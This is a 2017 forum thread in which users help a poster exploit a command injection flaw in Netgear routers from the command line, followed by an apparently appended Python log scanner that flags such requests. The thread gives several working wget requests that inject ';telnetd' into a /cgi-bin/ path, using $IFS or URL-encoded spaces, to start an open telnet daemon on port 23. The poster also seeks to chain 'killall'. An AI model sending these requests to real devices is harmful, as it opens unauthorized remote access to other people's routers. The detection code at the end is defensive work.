anode Posted January 29, 2017

Been playing with the command injection vuln on the Netgear routers. Works great from a browser. I just have no chops with wget/curl. And would like to exploit via commandline. I've tried:

wget http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS'23'

I've even tried lynx but no love there either.

Jamo Posted January 29, 2017

Wrapping it in single quotes might help; now shell considers the `;` being part of the local shell command, not the wget/curl

wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'

anode (Author) Posted January 29, 2017

Thanks!! Been messing around with quotes, and made some progress.

wget "-IP-/cgi-bin/;telnetd"

This works great. But once I try to add/stack it fails. The $IFS (space) matches on both the host and target.

21 minutes ago, Jamo said:
> Wrapping it in single quotes might help; now shell considers the `;` being part of the local shell command, not the wget/curl
>
> wget 'http://<ROUTERIP>/cgi-bin/;telnetd$IFS-p$IFS"23"'

digininja Posted January 29, 2017

What do you mean matches?

anode (Author) Posted January 29, 2017

4 minutes ago, digininja said:
> What do you mean matches?

$IFS is a space on both systems.

digininja Posted January 29, 2017

I think there is a translation issue, do you mean variable? If you do, then using single quotes means the local shell won't treat it as a variable.

anode (Author) Posted January 29, 2017

I've swapped around the single double quotes in all sorts of combos. $IFS as a shell variable. It's equated to a space. (on both systems)

It works *perfectly* inside a web browser. I'm trying to get it to work with wget or curl. Getting telnet running on default port 23 is no prob. But would be nice to add arguments and options to do a 'killall'

(and I *do* thank you for all your help (globally here). You're a good/helpful guy here.) ...When Digininja speaks, hackers listen (old US inside joke)

33 minutes ago, digininja said:
> I think there is a translation issue, do you mean variable? If you do, then using single quotes means the local shell won't treat it as a variable.

digininja Posted January 29, 2017

Either without quotes, or in double quotes, strings starting with dollar signs are treated as variables; in single quotes they are treated as literals, as you can see in this screenshot.

What is your exact problem? From your last post it doesn't sound like it is the variables that are causing you the issues.

digip Posted January 31, 2017

On 1/29/2017 at 5:35 PM, kdodge said:
> it looks like he's trying to exec the telnetd on the router, you could try the %20 for a space
>
> wget 'http:///cgi-bin/;telnetd%20-p%2023'
>
> or just a regular space
>
> wget 'http:///cgi-bin/;telnetd -p 23'

Was going to suggest URL encoding as you did. %27 for single quote (if needed anywhere) and %20 for spaces. Wrapping the whole request in single or double quotes should work with regular spaces though without the need for $IFS (whatever that is) unless $IFS was a needed part of the attack string/escape sequence.

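For defenders, the request shapes discussed in this thread (a `;` directly after `/cgi-bin/`, with `$IFS` or `%20` standing in for spaces) are straightforward to flag in HTTP logs. The following is an added example, not part of the original thread: it assumes requests to the device are visible in a combined-format access log from a proxy or sensor, and the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>[^"]+?) HTTP/[\d.]+"')
# Shell syntax that does not belong in a CGI path: command separators,
# command substitution, and the $IFS / ${IFS} stand-in for a space.
SHELL_RE = re.compile(r';|\||&&|`|\$\(|\$\{?IFS\}?')

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2017:17:02:11 +0000] "GET /cgi-bin/;telnetd$IFS-p$IFS23 HTTP/1.1" 200 0',
    '192.0.2.10 - - [29/Jan/2017:17:05:40 +0000] "GET /cgi-bin/;telnetd%20-p%2023 HTTP/1.1" 200 0',
    '192.0.2.22 - - [29/Jan/2017:17:06:02 +0000] "GET /cgi-bin/status.cgi?page=1 HTTP/1.1" 200 512',
    '192.0.2.22 - - [29/Jan/2017:17:06:09 +0000] "GET /index.htm HTTP/1.1" 200 2048',
]

def suspicious_cgi_request(log_line):
    """Return the decoded path if it carries shell syntax under /cgi-bin/, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # Only the path is inspected; ';' can be a legitimate query-string separator.
    path = m.group("target").split("?", 1)[0]
    # Decode twice so %3B and double-encoded %253B are both seen as ';'.
    decoded = unquote(unquote(path))
    if not decoded.startswith("/cgi-bin/"):
        return None
    tail = decoded[len("/cgi-bin/"):]
    if SHELL_RE.search(tail) or " " in tail:
        return decoded
    return None

def scan(lines):
    """Return the decoded paths of all flagged requests, in log order."""
    return [hit for hit in map(suspicious_cgi_request, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", hit)
```

Decoding before matching matters because the `$IFS` form and the `%20` form reach the device as different byte strings but describe the same command line.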